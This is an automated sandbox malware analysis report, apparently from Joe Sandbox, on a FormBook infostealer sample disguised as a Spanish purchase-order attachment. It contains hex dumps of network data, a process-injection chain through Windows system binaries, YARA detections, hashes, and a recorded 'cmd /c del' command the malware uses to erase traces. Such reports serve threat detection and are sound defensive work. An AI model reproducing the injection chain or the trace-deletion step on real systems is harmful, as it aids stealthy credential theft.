2021-11-25 15:51:58 UTC	1333	IN	Data Raw: 58 c1 9b 64 0d f5 95 84 74 0f 47 8c d0 6d 3b 32 07 37 be 5b aa 78 f7 37 69 8d 7d 69 9b e6 89 5c c3 04 a0 ea 32 d1 94 15 1f 54 51 df cd b6 5d 03 e9 a4 39 a4 18 71 68 68 85 f3 e4 42 42 b1 e7 61 a7 50 4d e6 48 1a e2 91 8c b1 e4 4d 95 2d 31 dd 58 51 d4 b5 a9 00 19 1f 54 50 a2 b6 4d 1e 69 23 31 cd d5 72 fa 4f 22 8b 45 4f ae c1 00 22 cd 5b bf d3 91 8d 35 c2 4a f2 0b 86 48 91 89 fc 0d 16 41 c0 8d 41 fe a5 d6 1d 5e 8d 35 1d 59 34 37 0f 7f de 82 de 4c 12 f2 6e 79 74 3b 72 16 9f be 79 07 6e f0 36 74 ff 9a 18 9d e6 1d a6 7c 13 8d be ad 61 36 0a bf 59 55 7e 4c 93 c3 45 4b 5e 70 f5 82 af 78 66 b3 55 5b 31 99 aa e3 f4 4a 96 15 82 22 32 5a be f1 b8 ea 37 e7 9f eb a9 00 a4 19 ee 43 44 e0 60 a4 0a 82 71 2c 47 1e 28 00 9a d7 b4 a1 f0 72 a3 fd fb 52 6a 6d ad 53 d5 99 23 4b Data Ascii: XdtGm;27[x7i}i\2TQ]9qhhBBaPMHM-1XQTPMi#1rO"EO"[5JHAA^5Y47Lnyt;ryn6t\|a6YU~LEK^pxfU[1J"2Z7CD`q,G(rRjmS#K
2021-11-25 15:51:58 UTC	1349	IN	Data Raw: 40 4b 29 c4 88 07 42 82 62 e4 30 55 72 cc c0 be f9 a9 d8 fa 4f 23 b9 2c 0a fe dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 b1 9c f4 32 35 90 34 1a 6a 95 bb 7d d3 67 5f 0b 4a 62 d2 ab 3a d6 f5 82 11 14 0f c3 73 59 3c 33 eb 99 dc 44 b1 34 5f 0b 4f 0b 79 cc ea 3b f1 f8 2f 0f 83 a5 fa 43 05 28 49 38 69 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 36 6c c7 3d 99 ae e3 d0 83 d1 01 2d 99 99 d7 77 c7 7c e7 9f ab 3a d6 f5 82 11 14 0f c3 73 59 3c 33 eb 99 dc 44 b1 34 5f 0b 4f 0b 79 cc ea 3b f1 f9 ca 0f 83 a5 fa 43 05 28 46 58 b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 be 6d fe 2b a6 0f f1 fd b2 fa 2a 14 4a 9c 64 97 e4 ec 2c 0b 4a 2e Data Ascii: @K)Bb0UrO#,,Kdw,Kdw,KX254j}g_Jb:sY<3D4_Oy;/C(I8idw,Kdw,Kd6l=-w\|:sY<3D4_Oy;C(FX,Kdw,Kdw,KXm+*Jd,J.
2021-11-25 15:51:58 UTC	1365	IN	Data Raw: 69 ef 5b 04 6e 14 4a 95 22 77 0c ea 52 a9 fa cc 38 2c c2 04 50 aa 88 ce 06 6d 08 fd 38 a8 75 35 ed 96 de 6f 9f ae 1a 5d 73 0f 58 3c 38 b1 93 32 a5 9f c3 ad 0e 40 b5 86 19 44 5b 2c 94 b0 d3 e4 d8 c9 88 74 76 0c 13 0e 04 a7 74 0b 3c f8 a6 38 e0 06 2c c8 26 79 07 9e 2c c2 3b b4 a3 f5 49 e0 4b 92 30 be 4d 5b c8 2a 03 67 5f 4b 19 3c f3 36 64 d7 77 12 8c 33 dd 86 2c 4b bd 8e c2 3b a4 f1 b0 c3 ce ed eb 22 65 0c a8 5e 0c 78 e5 11 dd 46 07 6e b4 c3 79 a9 fb 12 0b 79 c8 85 36 49 97 17 1c e0 53 d5 99 23 4a e7 81 49 d7 77 c7 88 e1 f8 5a 37 83 fc 0d 24 f7 f4 40 39 bb ad 0b 86 0c 72 9e 59 c3 21 b0 d6 32 93 a5 af d3 5e 24 bc e1 50 2e 93 96 0b ba ac 73 82 44 5c 2b 0a dd 40 f6 86 77 d9 ba ac 73 82 44 6e 18 df a0 ad 85 a4 05 9a 64 0f 08 03 ef e5 c9 54 af 6b 59 3c 73 7d 94 Data Ascii: i[nJ"wR8,Pm8u5o]sX<82@D[,tvt<8,&y,;IK0M[*g_K<6dw3,K;"e^xFnyy6IS#JIwZ7$@9rY!2^$P.sD\+@wsDndTkY<s}
2021-11-25 15:51:58 UTC	1381	IN	Data Raw: 49 99 1f f0 68 1e d7 89 b6 4d 1f 1a c8 59 c3 ba 14 c8 3a ad 85 72 71 8a bc e2 40 7d d6 78 ca 8c 62 de cd dd 1d b8 73 59 10 de 0f f7 07 ea d8 05 97 fc bc 7d a5 2e db 7e e7 24 c7 a7 3c f8 92 c0 4c 10 f1 7c 90 10 56 b4 e0 83 66 87 f1 b4 64 54 34 41 dd a2 5f 90 40 09 b4 24 c8 2d 30 02 0a 3f c8 06 67 a0 91 74 e3 7d 55 b9 f4 cb ab 82 d6 31 5b 17 c4 c8 92 c6 0e 5b 1f 54 50 5b 37 0f 4a a5 2c c0 41 ff 67 64 3f 38 e2 cb d2 19 17 c1 13 1d a6 75 40 20 c8 59 67 a0 91 70 51 c0 7d 1d 66 89 39 24 bc 4b e6 e4 b8 42 83 14 cf 26 b1 10 50 28 41 6a e6 77 87 c5 92 c0 ed 6e 34 dc e8 a9 51 b8 aa 8b 7b cc 39 67 04 18 e6 a5 2e b8 69 ef 73 28 cc 14 84 d8 05 90 96 bd ff e8 e2 56 39 e4 4d 93 cd 34 50 cf 63 3f 23 3e 2b 09 b0 15 7e 93 98 99 81 45 81 ff 85 f1 7b 4b ee 33 a8 af ea a7 15 Data Ascii: IhMY:rq@}xbsY}.~$<L\|VfdT4A_@$-0?gt}U1[[TP[7J,Agd?8u@ YgpQ}f9$KB&P(Ajwn4Q{9g.is(V9M4Pc?#>+~E{K3
2021-11-25 15:51:58 UTC	1397	IN	Data Raw: cf e8 dd 79 6e 3b 19 9a d4 d4 e4 93 04 e4 d0 6d ad 85 a8 ff 03 5f 5f 35 22 b7 d8 05 96 56 5c c5 c1 64 d3 e4 e7 60 30 2c a3 36 ef 9a 21 6b ec 08 f5 4b d9 4f d3 e6 c7 c4 99 8a 64 d7 37 6a e6 19 5e 95 89 ea 78 f6 ba 51 86 c4 59 34 12 81 76 07 bc b7 f4 cb 9e e2 11 f5 3a 55 f1 93 c5 a1 30 66 d8 87 50 20 f5 49 16 69 a7 c4 83 a2 98 81 93 c9 29 c5 b1 9b 1e d7 88 6c 03 a2 f8 ba 24 ed 25 43 8e 16 42 d1 84 ac d9 7c 53 a0 ad 55 6c b4 79 b5 44 97 3c b2 8b 50 64 de 7c ca ee 57 6d 61 bb e1 b9 d0 a0 e5 8c d7 a7 d6 09 23 3e 65 b1 d8 fb f0 43 dc 3d 90 59 b7 41 0e 8b df 80 69 66 3e fb 8b bd f1 3b f5 04 64 d1 83 47 7a 44 8f 04 64 df 4d 9d d2 9e b0 af 17 c8 59 38 27 34 4a e2 59 7d e3 4c a2 6c 60 c3 ce c7 3b f3 57 f6 17 55 33 df fc 84 0e fc 03 ef 4f 65 d1 3c 07 91 4d 4f 57 c1 Data Ascii: yn;m__5"V\d`0,6!kKOd7j^xQY4v:U0fP Ii)l$%CB\|SUlyD<Pd\|Wma#>eC=YAif>;dGzDdMY8'4JY}Ll`;WU3Oe<MOW

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Se adjunta el pedido, proforma.exe PID: 7088 Parent PID: 684

General

Start time:	16:51:18
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe"
Imagebase:	0x400000
File size:	731136 bytes
MD5 hash:	DEEA7525A547ED7A9EF6C81B04478F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: mobsync.exe PID: 6648 Parent PID: 7088

General

Start time:	16:51:35
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\mobsync.exe
Imagebase:	0xf00000
File size:	93184 bytes
MD5 hash:	44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6648

General

Start time:	16:51:37
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: Lxtcsmeg.exe PID: 5740 Parent PID: 3424

General

Start time:	16:51:45
Start date:	25/11/2021
Path:	C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe"
Imagebase:	0x400000
File size:	731136 bytes
MD5 hash:	DEEA7525A547ED7A9EF6C81B04478F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Lxtcsmeg.exe PID: 6868 Parent PID: 3424

General

Start time:	16:51:54
Start date:	25/11/2021
Path:	C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe"
Imagebase:	0x400000
File size:	731136 bytes
MD5 hash:	DEEA7525A547ED7A9EF6C81B04478F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: cscript.exe PID: 6820 Parent PID: 3424

General

Start time:	16:52:05
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0xef0000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6384 Parent PID: 6820

General

Start time:	16:52:11
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\mobsync.exe"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1284 Parent PID: 6384

General

Start time:	16:52:12
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: logagent.exe PID: 5048 Parent PID: 5740

General

Start time:	16:52:13
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:	0x10c0000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: mobsync.exe PID: 5036 Parent PID: 6868

General

Start time:	16:52:20
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\mobsync.exe
Imagebase:	0xf00000
File size:	93184 bytes
MD5 hash:	44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 740 Parent PID: 5148

General

Start time:	16:52:50
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Se adjunta el pedido, proforma.exe PID: 7088 Parent PID: 684 Se adjunta el pedido, proforma.exeCOMMON

Executed Functions

Non-executed Functions

Function 0361256A, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.685599209.00000000035E4000.00000004.00000001.sdmp, Offset: 035E4000, based on PE: false

Associated: 00000000.00000003.688073027.00000000035E4000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb28f9045e7e72fdf7e3b190c9edf81e835a73fd7319d6de755b9b348091e1f4
Instruction ID: 6239b0545e45cab5151f9842d0b02fb7d5fe3ca48dca63c4720abeb820eb96c6
Opcode Fuzzy Hash: fb28f9045e7e72fdf7e3b190c9edf81e835a73fd7319d6de755b9b348091e1f4
Instruction Fuzzy Hash: 6B51AB6544F3D25FC7634B745871492BFB0AE5362832F49DFC0C0CE8A3E1590AAAD762

Uniqueness

Uniqueness Score: -1.00%

Function 0360B500, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.685599209.00000000035E4000.00000004.00000001.sdmp, Offset: 035E4000, based on PE: false

Associated: 00000000.00000003.688073027.00000000035E4000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf4d87b9e1fc551f0d1ac5e55d44a06110f75377eecb424809b922c36e1f426
Instruction ID: 817d7754b700d4ce599d3656e402a84fc03e88c25fed67a07c2fe67f96e02e98
Opcode Fuzzy Hash: 2bf4d87b9e1fc551f0d1ac5e55d44a06110f75377eecb424809b922c36e1f426
Instruction Fuzzy Hash: CC31C02655D3C29FC7178F78C4A5283BFA6AE832247AA46FEC4C14F063C321408ADB46

Uniqueness

Uniqueness Score: -1.00%

Function 0360AAAE, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.685599209.00000000035E4000.00000004.00000001.sdmp, Offset: 035E4000, based on PE: false

Associated: 00000000.00000003.688073027.00000000035E4000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf32b3d58a0871600eda2605607273d9a5ce94574ca431b5be45eef60169ec6
Instruction ID: aae4ae89c0f6aad7dc0b894fccf0f3fba6192cad4c22269024796ee832ac526a
Opcode Fuzzy Hash: bdf32b3d58a0871600eda2605607273d9a5ce94574ca431b5be45eef60169ec6
Instruction Fuzzy Hash: 9F11926546E3D1BEDF936B3484A40C3BFE05E076713AB62DEC4D14E0A3C611488BE752

Uniqueness

Uniqueness Score: -1.00%

Function 03802467, Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

i^]i, xrefs: 03802631
l\V, xrefs: 038025C3
ql\V, xrefs: 0380250E
3[]i, xrefs: 0380257D
7l\V, xrefs: 03802569
]m\V, xrefs: 0380261C
l\V, xrefs: 038024B5

Memory Dump Source

Source File: 00000000.00000003.676143158.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Associated: 00000000.00000003.684002623.0000000003800000.00000004.00000001.sdmp Download File
Associated: 00000000.00000003.691099146.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i$ql\V$l\V
API String ID: 0-4241164054
Opcode ID: 1cfecf92b277f1127450c1a02dc5bb0ad80a61e80706c04008f3008b01bafa7f
Instruction ID: bfc65f6d31bc559a0ca0d049309234ca42e438a9891dab69de2b3ab1a2c0abc7
Opcode Fuzzy Hash: 1cfecf92b277f1127450c1a02dc5bb0ad80a61e80706c04008f3008b01bafa7f
Instruction Fuzzy Hash: 8F4131738446045FE710CAE8EC562E6F7BEFB1473076405A7DC00CF522E6A1A55B8BD1

Uniqueness

Uniqueness Score: -1.00%

Function 038C2097, Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

ql\V, xrefs: 038C213E
i^]i, xrefs: 038C2261
l\V, xrefs: 038C21F3
l\V, xrefs: 038C20E5
3[]i, xrefs: 038C21AD
]m\V, xrefs: 038C224C
7l\V, xrefs: 038C2199

Memory Dump Source

Source File: 00000000.00000003.684981069.00000000038C0000.00000004.00000001.sdmp, Offset: 0384C000, based on PE: false

Associated: 00000000.00000003.691099146.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i$ql\V$l\V
API String ID: 0-4241164054
Opcode ID: 9cf0c30d5acab74af1eba7420ec507d0970f6ee6996157bf61585585a0131b7a
Instruction ID: a25565ea2f583622e794493645cb09607aa91396c0c9354fe81207a8986c5385
Opcode Fuzzy Hash: 9cf0c30d5acab74af1eba7420ec507d0970f6ee6996157bf61585585a0131b7a
Instruction Fuzzy Hash: 6B41F0738552445BEB10CAA8E8422E6F7BEFB5473076405ABDD00CF522E631E55B8BD1

Uniqueness

Uniqueness Score: -1.00%

Function 03802576, Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

i^]i, xrefs: 03802631
l\V, xrefs: 038025C3
3[]i, xrefs: 0380257D
7l\V, xrefs: 03802569
]m\V, xrefs: 0380261C

Memory Dump Source

Source File: 00000000.00000003.676143158.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Associated: 00000000.00000003.684002623.0000000003800000.00000004.00000001.sdmp Download File
Associated: 00000000.00000003.691099146.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i
API String ID: 0-435519228
Opcode ID: 4c2a37786e1de0098514a467bde8269a5f1800b32b007f56f287c8d2adde55fa
Instruction ID: d0a4a829d51db47f5c0c4b427f0157b270bbbeeae7de06ff054866d80b8165ff
